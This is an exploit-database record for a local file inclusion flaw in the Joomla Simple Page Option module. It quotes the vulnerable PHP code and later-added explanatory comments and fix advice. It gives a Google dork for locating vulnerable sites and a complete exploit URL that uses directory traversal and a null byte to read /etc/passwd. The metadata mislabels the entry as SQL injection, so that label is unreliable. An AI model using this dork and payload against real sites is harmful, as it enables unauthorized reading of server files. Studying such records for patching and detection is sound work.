ID 1337DAY-ID-16551
Type zdt
Reporter SeguridadBlanca
Modified 2011-07-21T00:00:00
Description
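Exploit for php platform in category web applications. Note: the record's "title" field below labels this entry as SQL injection, but the advisory text describes a local file inclusion (LFI) through the spo_site_lang parameter; triage it as LFI.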
# Exploit Title: Simple Page Option LFI
# Google Dork: inurl:mod_spo
# Date: 15/07/2011
# Author: SeguridadBlanca.Blogspot.com or SeguridadBlanca
# Software Link: http://joomlacode.org/gf/download/frsrelease/11841/47776/mod_spo_1.5.16.zip
# Version: 1.5.x
# Tested on: Backtrack and Windows 7
Simple Page Option – LFI
Vulnerable-Code:
// Vulnerable pattern quoted by the advisory: the language name is read from the
// request parameter 'spo_site_lang'; no validation of the value is visible
// between this read and its use in the include path below.
$s_lang
=& JRequest::getVar('spo_site_lang');
// $s_lang is concatenated as-is between the 'languages' directory and the
// '.php' suffix, so the request decides which file is checked and included.
// If that file does not exist, english.php is included instead.
(file_exists(dirname(__FILE__).DS.'languages'.DS.$s_lang.'.php'))
? include(dirname(__FILE__).DS.'languages'.DS.$s_lang.'.php')
: include(dirname(__FILE__).DS.'languages'.DS.'english.php');
Vulnerable-Var:
spo_site_lang=
Expl0iting:
http://www.xxx.com/home/modules/mod_spo/[email protected]&spo_f_email[0][email protected]&spo_message=20&spo_msg_ftr=This%20contact%20message%20was%20generated%20using
%20Simple%20Page%20Options%20Module%20from%20SITEURL.&spo_send_type=&spo_site_lang=../../../../../../../../../../etc/passwd% 00&spo_site_name=Alfredo%20Arauz&spo_url_type=1&spo_url2se
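Repairing?:
Just filter with str_replace(); or use htaccess protection on the vulnerable file. Stripping traversal sequences with str_replace() is a blacklist and is easy to leave incomplete, so the more reliable fix is to accept spo_site_lang only when it matches one of the language file names shipped in the languages directory, and to fall back to english.php otherwise. PHP 5.3.4 and later reject null bytes in file paths, which stops the '.php' suffix from being cut off as in the request above, but the parameter can still point at other .php files, so the input check is needed either way.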
gr33tz: Alfredo Arauz, SeguridadBlanca.Blogspot.com, Ecuador and Perú Security.
# 0day.today [2018-01-01] #
{"id": "1337DAY-ID-16551", "lastseen": "2018-01-01T09:10:49", "viewCount": 27, "bulletinFamily": "exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "edition": 2, "enchantments": {"score": {"value": -0.0, "vector": "NONE", "modified": "2018-01-01T09:10:49", "rev": 2}, "dependencies": {"references": [], "modified": "2018-01-01T09:10:49", "rev": 2}, "vulnersScore": -0.0}, "type": "zdt", "sourceHref": "https://0day.today/exploit/16551", "description": "Exploit for php platform in category web applications", "title": "Joomla Component mod_spo SQL Injection Vulnerability", "cvelist": [], "sourceData": "# Exploit Title: Simple Page Option LFI\r\n# Google Dork: inurl:mod_spo\r\n# Date: 15/07/2011\r\n# Author: SeguridadBlanca.Blogspot.com or SeguridadBlanca\r\n# Software Link: http://joomlacode.org/gf/download/frsrelease/11841/47776/mod_spo_1.5.16.zip\r\n# Version: 1.5.x\r\n# Tested on: Backtrack and Windows 7\r\n \r\nSimple Page Option \u00e2\u20ac\u201c LFI\r\nVulnerable-Code:\r\n$s_lang\r\n=& JRequest::getVar('spo_site_lang');\r\n(file_exists(dirname(__FILE__).DS.'languages'.DS.$s_lang.'.php'))\r\n? 
include(dirname(__FILE__).DS.'languages'.DS.$s_lang.'.php')\r\n: include(dirname(__FILE__).DS.'languages'.DS.'english.php');\r\nVulnerable-Var:\r\nspo_site_lang=\r\n \r\nExpl0iting:\r\nhttp://www.xxx.com/home/modules/mod_spo/[email\u00a0protected]<script type=\"text/javascript\">\r\n/* <![CDATA[ */\r\n(function(){try{var s,a,i,j,r,c,l=document.getElementById(\"__cf_email__\");a=l.className;if(a){s='';r=parseInt(a.substr(0,2),16);for(j=2;a.length-j;j+=2){c=parseInt(a.substr(j,2),16)^r;s+=String.fromCharCode(c);}s=document.createTextNode(s);l.parentNode.replaceChild(s,l);}}catch(e){}})();\r\n/* ]]> */\r\n</script>&spo_f_email[0][email\u00a0protected]<script type=\"text/javascript\">\r\n/* <![CDATA[ */\r\n(function(){try{var s,a,i,j,r,c,l=document.getElementById(\"__cf_email__\");a=l.className;if(a){s='';r=parseInt(a.substr(0,2),16);for(j=2;a.length-j;j+=2){c=parseInt(a.substr(j,2),16)^r;s+=String.fromCharCode(c);}s=document.createTextNode(s);l.parentNode.replaceChild(s,l);}}catch(e){}})();\r\n/* ]]> */\r\n</script>&spo_message=20&spo_msg_ftr=This%20contact%20message%20was%20generated%20using\r\n%20Simple%20Page%20Options%20Module%20from%20SITEURL.&spo_send_type=&spo_site_lang=../../../../../../../../../../etc/passwd% 00&spo_site_name=Alfredo%20Arauz&spo_url_type=1&spo_url2se\r\n \r\nReparing?:\r\nJust Filter with str_replace(); or htaccess protection to the vulnerable file.\r\n \r\ngr33tz: Alfredo Arauz, SeguridadBlanca.Blogspot.com, Ecuador and Per\u00c3\u00ba Security.\r\n\r\n\n\n# 0day.today [2018-01-01] #", "published": "2011-07-21T00:00:00", "references": [], "reporter": "SeguridadBlanca", "modified": "2011-07-21T00:00:00", "href": "https://0day.today/exploit/description/16551"}
{}